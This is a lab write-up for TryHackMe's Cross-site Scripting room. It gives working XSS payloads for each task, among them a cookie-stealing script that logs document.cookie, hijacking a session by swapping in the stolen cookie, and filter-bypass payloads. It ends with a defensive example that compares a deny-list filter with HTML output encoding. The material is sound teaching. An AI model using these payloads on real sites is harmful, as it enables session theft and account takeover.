This is the write-up for the Cross-site Scripting room on TryHackMe, which is part of the Web Fundamentals path.
Connect over the VPN or use the AttackBox on the TryHackMe site to reach the TryHackMe lab environment.
Tasks Cross-site Scripting
Task 1
Read all that is in this task and press complete
Task 2
Start the machine attached to this task. Then navigate to http://MACHINE_IP
Task 3
Read all that is in the task
3.1 Add a comment and see if you can insert some of your own HTML.
Basically any HTML tag will do.
Type in the following
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
<body>
<h1>This is a Heading</h1>
<p>This is a paragraph.</p>
</body>
</html>
3.2 Create an alert popup box appear on the page with your document cookies.
document.cookie is the JavaScript property that returns the cookies for the current page.
Type in the following
<script>alert(document.cookie)</script>
3.3 Change “XSS Playground” to “I am a hacker” by adding comments and using Javascript.
This can be done with an HTML script tag. Type in the following
<script>document.querySelector('#thm-title').textContent = 'I am a Hacker'</script>
The answer to this question will reveal itself on the page, not in a popup.
3.4 Take over Jack’s account by stealing his cookie, what was his cookie value?
As the hint says, they made it easy to write it to the log.
Type in the following
<script>document.location='/log/'+document.cookie</script>
Now navigate to http://MACHINE_IP/logs
See the cookie
Now copy the cookie (the part after connect.sid). This is also the answer to the question.
3.5 Post a comment as Jack.
Now we still have the cookie. Press F12 while on the page and select Storage.
Change the value of this cookie to the one in the log.
Reload the page and post a comment.
Task 4
4.1 Craft a reflected XSS payload that will cause a popup saying “Hello”
Type in the following, and also notice the URL
<script>alert("Hello")</script>
4.2 Craft a reflected XSS payload that will cause a popup with your machines IP address.
Type in the following
<script>alert(window.location.hostname)</script>
Task 5
5.1 Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.
Type in the following
test" onmouseover="alert('Hover over the image and inspect the image element')"
Now move the mouse over the "image not found" text. A popup will appear, so we now know it is working.
Type in the following command
test" onmouseover="alert(document.cookie)"
The next popup will have the answer
5.2 Create an onhover event on an image tag, that change the background color of the website to red.
Type in the following code
test" onmouseover="document.body.style.backgroundColor = 'red';
Task 6
Read all that is in the task, navigate to the IP and Port Scanning with XSS tab, and read the explanation of the code. Press complete when ready.
Task 7
You can copy the key logger code and put it in the stored XSS.
Task 8
8.1 Bypass the filter that removes any script tags.
<img src=x onerror=alert('Hello');>
8.2 The word alert is filtered, bypass it.
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
8.3 The word hello is filtered, bypass it.
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>
8.4 The filter in challenge 4 blocks the following:
- word “Hello”
- script
- onerror
- onsubmit
- onload
- onmouseover
- onfocus
- onmouseout
- onkeypress
- onchange
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert('Hello')"></xss>
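Why the word list in 8.4 does not stop this payload, seen from the defender's side. This is an added example, not code from the room or from this write-up: blocklistFilter is a hypothetical stand-in built from the list above, and it is compared with HTML output encoding of the same comment text.

```javascript
// Added example: deny-list filtering vs. output encoding for comment text.
// blocklistFilter is a hypothetical stand-in built from the word list in 8.4;
// the room's real filter code is not shown on this page.
const BLOCKED = ['hello', 'script', 'onerror', 'onsubmit', 'onload',
  'onmouseover', 'onfocus', 'onmouseout', 'onkeypress', 'onchange'];

function blocklistFilter(input) {
  // Remove every blocked word, case-insensitively, in a single pass.
  const pattern = new RegExp(BLOCKED.join('|'), 'gi');
  return input.replace(pattern, '');
}

// List event-handler attributes (on...=) still present in a string.
function survivingHandlers(html) {
  return (html.match(/\bon[a-z]+(?=\s*=)/gi) || []).map(s => s.toLowerCase());
}

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Output encoding: every character that can open a tag or close an attribute
// value becomes an entity, so the browser renders the comment as text.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// The 8.4 payload from this write-up, used as test input.
const payload = '<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(\'Hello\')"></xss>';

function compare(input) {
  const filtered = blocklistFilter(input);
  const escaped = escapeHtml(input);
  return {
    filtered,                                          // what the deny-list lets through
    handlersAfterFilter: survivingHandlers(filtered),  // handlers the list never named
    escaped,                                           // what output encoding produces
    escapedHasMarkup: /[<>"']/.test(escaped),          // true if any raw markup char remains
  };
}

const result = compare(payload);
console.log(result);
```

Setting HttpOnly on the session cookie additionally keeps it out of document.cookie, which is what 3.4 reads.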
Task 9
Read all that is in the task and press complete